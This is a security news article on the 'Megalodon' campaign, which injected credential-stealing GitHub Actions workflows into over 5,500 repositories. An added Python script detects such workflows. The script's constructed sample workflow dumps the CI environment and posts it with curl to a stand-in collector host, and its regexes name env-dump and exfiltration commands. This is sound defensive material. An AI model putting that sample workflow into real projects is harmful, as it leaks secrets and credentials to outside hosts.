Over 5,500 GitHub Repositories Infected in ‘Megalodon’ Supply Chain Attack
Megalodon campaign infected 5,500+ GitHub repos with malware via automated commits to steal credentials and secrets.
Summary
The Megalodon supply chain attack compromised over 5,500 GitHub repositories through 5,700+ malicious commits injected in a six-hour window on May 18, 2026. The attackers deployed GitHub Actions workflows containing payloads designed to exfiltrate CI environment variables, cloud credentials, SSH keys, API tokens, and other sensitive secrets from infected machines. The campaign was discovered after malicious versions of the Tiledesk open-source package were published; the attacker compromised the source repository and the maintainer unknowingly published the poisoned code.
Full text
More than 5,500 GitHub repositories were infected with malware in a supply chain attack that relies on automated commits, security researchers warn.

The campaign, dubbed Megalodon, relies on GitHub Actions workflows containing a payload designed to steal credentials, keys, tokens, and other secrets. The workflows, SafeDep says, were injected through over 5,700 malicious commits pushed to the impacted repositories within a six-hour window, on May 18.

According to the cybersecurity firm, the attackers deployed two payloads as part of the attack. One added a new workflow that would be triggered on every push and pull request; the other replaced existing workflows with specific triggers, creating dormant backdoors.

On infected machines, the malware would exfiltrate all CI environment variables, AWS credentials, GCP access tokens, Azure credentials, SSH private keys, Docker and Kubernetes configurations, API keys, database connection strings, GitHub Actions tokens, GitLab CI/CD tokens, and dozens of other types of secrets.

Megalodon, SafeDep explains, was discovered after malicious versions of the Tiledesk package, an open source live chat and chatbot platform, were identified. The infected packages were published between May 19 and May 21.

“The same NPM account, eljohnny ([email protected]), published both the clean 2.18.5 and the compromised versions. The attacker never touched the NPM account. They compromised the GitHub repository, and the maintainer published from the poisoned source without realizing it,” SafeDep says.

The malicious commit that led to the infection was pushed on May 18, authored by ‘build-bot’. SafeDep’s investigation into the associated email address uncovered a total of 2,878 commits made on the same day, along with an additional 2,841 commits made via a second email address.
“All 5,718 commits landed on the same day: May 18, 2026, across a six-hour window from approximately 11:36 to 17:48 UTC, targeting 5,561 distinct repositories,” SafeDep explains.

The cybersecurity firm also notes that the attackers’ choice of malicious GitHub Actions workflow trigger, namely ‘workflow_dispatch’, ensured that the dormant backdoor could be triggered at a later date via the GitHub API, using stolen GitHub tokens. The workflow is exempted from GitHub’s anti-recursion rules, which prevent new workflow runs from being spawned via GitHub token-triggered events.

Last week, NPM announced that all NPM granular access tokens with write access that bypass two-factor authentication have been invalidated to prevent supply chain attacks similar to Mini Shai-Hulud. According to Ox Security, this should prevent account hijacking, but does not resolve the underlying problem, and malicious code will continue to spread through compromised repositories.

“If platforms continue allowing any type of code to be uploaded without serious vetting, the number of attacks will only increase,” Ox notes. “We’ve entered a new supply chain attack era, and TeamPCP compromising GitHub was only the beginning. What’s coming next is an endless wave, a tsunami of cyber attacks on developers worldwide,” the cybersecurity firm says.

Written by Ionut Arghire. Ionut Arghire is an international correspondent for SecurityWeek.
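The article describes the shape of the dormant backdoor: a workflow that can be fired on demand through the API (`workflow_dispatch`), whose steps dump the CI environment and ship it off-host. The following is an added triage script, not code from the article, SafeDep, or GitHub, that a repository owner could run over `.github/workflows/*.yml` to flag files with that combination. It is regex-based (no YAML library needed) and deliberately heuristic; the two sample workflows and the host `collector.example.invalid` are constructed for the demonstration, not indicators from the campaign. It also checks `repository_dispatch`, which GitHub documents as sharing the same exemption from the GITHUB_TOKEN anti-recursion rule.

```python
"""Heuristic triage of GitHub Actions workflow files for the pattern described
in the Megalodon write-up: API-triggerable workflow + environment dump + outbound
transfer.  Added example; regex-based, no YAML dependency.  Samples are constructed."""

import re
from dataclasses import dataclass

# Triggers that GITHUB_TOKEN can fire and that GitHub exempts from its
# anti-recursion rule (workflow_dispatch is the one named in the article;
# repository_dispatch shares the exemption per GitHub's documentation).
API_TRIGGERS = ("workflow_dispatch", "repository_dispatch")

# Shell commands / expressions that expose the whole environment or secret context.
# The lookarounds keep ".env", "${{ env.FOO }}" and "env-xyz" from matching.
ENV_DUMP = re.compile(r"(?<![.\w$])(printenv|env)\b(?![.\w-])|toJSON\((secrets|env)\)")

# Outbound transfer with a request body, or data piped into curl/wget.
EXFIL = re.compile(
    r"\b(curl|wget)\b[^\n]*(\s-(d|T|F|X)\s|--data|--upload-file|--post-data)"
    r"|\|\s*(curl|wget)\b"
)


def extract_run_scripts(text: str) -> list:
    """Return the shell text of every `run:` step (inline or block scalar)."""
    scripts, lines, i = [], text.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^([ \t]*)-?[ \t]*run:[ \t]*(.*)$", lines[i])
        if not m:
            i += 1
            continue
        indent, rest = len(m.group(1)), m.group(2).strip()
        if rest in ("|", ">", "|-", ">-"):          # block scalar: collect deeper-indented lines
            body, i = [], i + 1
            while i < len(lines) and (not lines[i].strip()
                                      or len(lines[i]) - len(lines[i].lstrip()) > indent):
                body.append(lines[i].strip())
                i += 1
            scripts.append("\n".join(body))
        else:                                         # inline: run: npm test
            scripts.append(rest)
            i += 1
    return scripts


def triggers(text: str) -> set:
    """Collect event names under the top-level `on:` key (inline list or nested mapping)."""
    m = re.search(r"^on:[ \t]*(.*)$", text, re.M)
    if not m:
        return set()
    inline = m.group(1).strip()
    if inline:                                        # on: push   /   on: [push, workflow_dispatch]
        return set(re.findall(r"[A-Za-z_]+", inline))
    found, level = set(), None
    for line in text[m.end():].splitlines():
        if not line.strip():
            continue
        ind = len(line) - len(line.lstrip())
        if ind == 0:                                  # back at top level: end of the on: mapping
            break
        level = ind if level is None else level
        if ind == level:                              # only first-level keys are event names
            k = re.match(r"[ \t]*-?[ \t]*([A-Za-z_]+)", line)
            if k:
                found.add(k.group(1))
    return found


@dataclass
class Finding:
    path: str
    api_triggers: list
    env_dump: bool
    exfil: bool

    @property
    def suspicious(self) -> bool:
        # Dormant-backdoor shape: fireable on demand AND dumps env AND sends it out.
        return bool(self.api_triggers) and self.env_dump and self.exfil


def scan_workflow(path: str, text: str) -> Finding:
    scripts = "\n".join(extract_run_scripts(text))
    return Finding(
        path=path,
        api_triggers=sorted(triggers(text) & set(API_TRIGGERS)),
        env_dump=bool(ENV_DUMP.search(scripts)),
        exfil=bool(EXFIL.search(scripts)),
    )


# Constructed samples (hypothetical, not the campaign's actual files).
BENIGN = """\
name: CI
on:
  push:
    branches: [main]
  pull_request:
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci
      - run: npm test
"""

SUSPECT = """\
name: build
on:
  workflow_dispatch:
  push:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: build
        run: |
          printenv > /tmp/ci-env.txt
          curl -s -X POST --data @/tmp/ci-env.txt https://collector.example.invalid/
      - run: npm ci
"""

if __name__ == "__main__":
    for name, body in (("ci.yml", BENIGN), ("build.yml", SUSPECT)):
        f = scan_workflow(name, body)
        print(f"{name}: suspicious={f.suspicious} triggers={f.api_triggers} "
              f"env_dump={f.env_dump} exfil={f.exfil}")
```

A hit here is a reason to read the file and its `git log -p` history (the article notes the commits were authored by ‘build-bot’ in a narrow window), not a verdict; legitimate workflows occasionally print the environment for debugging, and a payload can be obfuscated past simple pattern matching. Pairing this with a rule that any change under `.github/workflows/` requires review from a code owner closes the gap the heuristic leaves.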
Indicators of Compromise
- malware — Megalodon